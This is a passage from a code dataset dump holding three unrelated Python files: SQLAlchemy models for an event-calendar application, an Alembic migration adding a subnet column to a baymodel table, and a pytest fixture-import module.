CheckConstraint(
"NOT(event_place_id IS NULL AND event_place_text IS NULL)",
),
CheckConstraint("NOT(organizer_id IS NULL AND organizer_text IS NULL)"),
)
id = Column(Integer(), primary_key=True)
start = db.Column(db.DateTime(timezone=True), nullable=False)
end = db.Column(db.DateTime(timezone=True), nullable=True)
allday = db.Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
recurrence_rule = Column(UnicodeText())
review_status = Column(IntegerEnum(EventReviewStatus))
rejection_resaon = Column(IntegerEnum(EventRejectionReason))
contact_name = Column(Unicode(255), nullable=False)
contact_email = Column(Unicode(255))
contact_phone = Column(Unicode(255))
contact_email_notice = Column(Boolean())
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
event_place_id = db.Column(
db.Integer, db.ForeignKey("eventplace.id"), nullable=True
)
event_place = db.relationship("EventPlace", uselist=False)
event_place_text = Column(Unicode(255), nullable=True)
organizer_id = db.Column(
db.Integer, db.ForeignKey("eventorganizer.id"), nullable=True
)
organizer = db.relationship("EventOrganizer", uselist=False)
organizer_text = Column(Unicode(255), nullable=True)
categories = relationship(
"EventCategory", secondary="eventsuggestion_eventcategories"
)
event_id = db.Column(
db.Integer, db.ForeignKey("event.id", ondelete="SET NULL"), nullable=True
)
event = db.relationship("Event", uselist=False)
@hybrid_property
def verified(self):
return self.review_status == EventReviewStatus.verified
@listens_for(EventSuggestion, "before_insert")
@listens_for(EventSuggestion, "before_update")
def purge_event_suggestion(mapper, connect, self):
if self.organizer_id is not None:
self.organizer_text = None
if self.event_place_id is not None:
self.event_place_text = None
self.purge_event_mixin()
sanitize_allday_instance(self)
class Event(db.Model, TrackableMixin, EventMixin):
__tablename__ = "event"
id = Column(Integer(), primary_key=True)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
organizer_id = db.Column(
db.Integer, db.ForeignKey("eventorganizer.id"), nullable=False
)
organizer = db.relationship("EventOrganizer", uselist=False)
event_place_id = db.Column(
db.Integer, db.ForeignKey("eventplace.id"), nullable=False
)
event_place = db.relationship("EventPlace", uselist=False)
categories = relationship("EventCategory", secondary="event_eventcategories")
co_organizers = relationship(
"EventOrganizer",
secondary="event_coorganizers",
backref=backref("co_organized_events", lazy=True),
)
event_lists = relationship(
"EventList",
secondary="event_eventlists",
backref=backref("events", lazy=True),
)
public_status = Column(
IntegerEnum(PublicStatus),
nullable=False,
default=PublicStatus.published.value,
server_default=str(PublicStatus.published.value),
)
status = Column(IntegerEnum(EventStatus))
previous_start_date = db.Column(db.DateTime(timezone=True), nullable=True)
rating = Column(Integer(), default=50)
@property
def min_start_definition(self):
if self.date_definitions:
return min(self.date_definitions, key=lambda d: d.start)
else:
return None
@hybrid_property
def min_start(self):
if self.date_definitions:
return min(d.start for d in self.date_definitions)
else:
return None
@min_start.expression
def min_start(cls):
return (
select([EventDateDefinition.start])
.where(EventDateDefinition.event_id == cls.id)
.order_by(EventDateDefinition.start)
.limit(1)
.as_scalar()
)
@hybrid_property
def is_recurring(self):
if self.date_definitions:
return any(d.recurrence_rule for d in self.date_definitions)
else:
return False
@is_recurring.expression
def is_recurring(cls):
return (
select([func.count()])
.select_from(EventDateDefinition.__table__)
.where(
and_(
EventDateDefinition.event_id == cls.id,
func.coalesce(EventDateDefinition.recurrence_rule, "") != "",
)
)
.as_scalar()
) > 0
date_definitions = relationship(
"EventDateDefinition",
order_by="EventDateDefinition.start",
backref=backref("event", lazy=False),
cascade="all, delete-orphan",
)
dates = relationship(
"EventDate", backref=backref("event", lazy=False), cascade="all, delete-orphan"
)
references = relationship(
"EventReference",
backref=backref("event", lazy=False),
cascade="all, delete-orphan",
)
reference_requests = relationship(
"EventReferenceRequest",
backref=backref("event", lazy=False),
cascade="all, delete-orphan",
)
@hybrid_property
def category(self):
if self.categories:
return self.categories[0]
else:
return None
@property
def co_organizer_ids(self):
return [c.id for c in self.co_organizers]
@co_organizer_ids.setter
def co_organizer_ids(self, value):
self.co_organizers = EventOrganizer.query.filter(
EventOrganizer.id.in_(value)
).all()
def validate(self):
if self.organizer and self.organizer.admin_unit_id != self.admin_unit_id:
raise make_check_violation("Invalid organizer.")
if self.co_organizers:
for co_organizer in self.co_organizers:
if (
co_organizer.admin_unit_id != self.admin_unit_id
or co_organizer.id == self.organizer_id
):
raise make_check_violation("Invalid co-organizer.")
if self.event_place and self.event_place.admin_unit_id != self.admin_unit_id:
raise make_check_violation("Invalid place.")
if not self.date_definitions or len(self.date_definitions) == 0:
raise make_check_violation("At least one date defintion is required.")
@listens_for(Event, "before_insert")
@listens_for(Event, "before_update")
def before_saving_event(mapper, connect, self):
self.validate()
self.purge_event_mixin()
class EventDate(db.Model):
__tablename__ = "eventdate"
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
start = db.Column(db.DateTime(timezone=True), nullable=False, index=True)
end = db.Column(db.DateTime(timezone=True), nullable=True, index=True)
allday = db.Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
@listens_for(EventDate, "before_insert")
@listens_for(EventDate, "before_update")
def purge_event_date(mapper, connect, self):
sanitize_allday_instance(self)
class EventDateDefinition(db.Model):
__tablename__ = "eventdatedefinition"
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
start = db.Column(db.DateTime(timezone=True), nullable=False)
end = db.Column(db.DateTime(timezone=True), nullable=True)
allday = db.Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
recurrence_rule = Column(UnicodeText())
def validate(self):
if self.start and self.end:
if self.start > self.end:
raise make_check_violation("The start must be before the end.")
max_end = self.start + relativedelta(days=14)
if self.end > max_end:
raise make_check_violation("An event can last a maximum of 14 days.")
@listens_for(EventDateDefinition, "before_insert")
@listens_for(EventDateDefinition, "before_update")
def before_saving_event_date_definition(mapper, connect, self):
self.validate()
sanitize_allday_instance(self)
class EventEventCategories(db.Model):
__tablename__ = "event_eventcategories"
__table_args__ = (UniqueConstraint("event_id", "category_id"),)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
category_id = db.Column(
db.Integer, db.ForeignKey("eventcategory.id"), nullable=False
)
class EventSuggestionEventCategories(db.Model):
__tablename__ = "eventsuggestion_eventcategories"
__table_args__ = (UniqueConstraint("event_suggestion_id", "category_id"),)
id = Column(Integer(), primary_key=True)
event_suggestion_id = db.Column(
db.Integer, db.ForeignKey("eventsuggestion.id"), nullable=False
)
category_id = db.Column(
db.Integer, db.ForeignKey("eventcategory.id"), nullable=False
)
class EventCoOrganizers(db.Model):
__tablename__ = "event_coorganizers"
__table_args__ = (UniqueConstraint("event_id", "organizer_id"),)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
organizer_id = db.Column(
db.Integer, db.ForeignKey("eventorganizer.id"), nullable=False
)
class EventList(db.Model, TrackableMixin):
__tablename__ = "eventlist"
__table_args__ = (
UniqueConstraint(
"name", "admin_unit_id", name="eventreference_name_admin_unit_id"
),
)
id = Column(Integer(), primary_key=True)
name = Column(Unicode(255))
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
class EventEventLists(db.Model):
__tablename__ = "event_eventlists"
__table_args__ = (UniqueConstraint("event_id", "list_id"),)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
list_id = db.Column(db.Integer, db.ForeignKey("eventlist.id"), nullable=False)
class Analytics(db.Model):
__tablename__ = "analytics"
id = Column(Integer(), primary_key=True)
key = Column(Unicode(255))
value1 = Column(Unicode(255))
value2 = Column(Unicode(255))
created_at = Column(DateTime, default=datetime.datetime.utcnow)
# Deprecated begin
class FeaturedEventReviewStatus(IntEnum):
inbox = 1
verified = 2
rejected = 3
class FeaturedEventRejectionReason(IntEnum):
duplicate = 1
untrustworthy = 2
illegal = 3
irrelevant = 4
# Deprecated end
|
py | 7dfaffd40ca12338a2844757b3a5032da2a4ac0d | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Add fixed_subnet column to baymodel table
Revision ID: e0653b2d5271
Revises: 68ce16dfd341
Create Date: 2016-06-29 14:14:37.862594
"""
# revision identifiers, used by Alembic.
revision = 'e0653b2d5271'
down_revision = '68ce16dfd341'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('baymodel', sa.Column('fixed_subnet',
sa.String(length=255), nullable=True))
|
py | 7dfb002d3a24aa33e2b94a506a6660e547fe4227 | import pytest
from tests.fixtures.im_fixtures import (
im_rgb_np,
im_mch_np,
im_gry_np,
dask_im_rgb_np,
dask_im_gry_np,
dask_im_mch_np,
zarr_im_rgb_np,
zarr_im_gry_np,
zarr_im_mch_np,
mask_np,
disk_im_mch,
disk_im_rgb,
disk_im_gry,
disk_im_mch_notile,
disk_im_gry_pyr,
disk_im_mch_pyr,
disk_im_rgb_pyr,
)
from tests.fixtures.transform_fixtures import (
complex_transform,
complex_transform_larger,
simple_transform_affine,
simple_transform_affine_nl,
simple_transform_affine_large_output,
simple_transform_affine_nl_large_output,
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.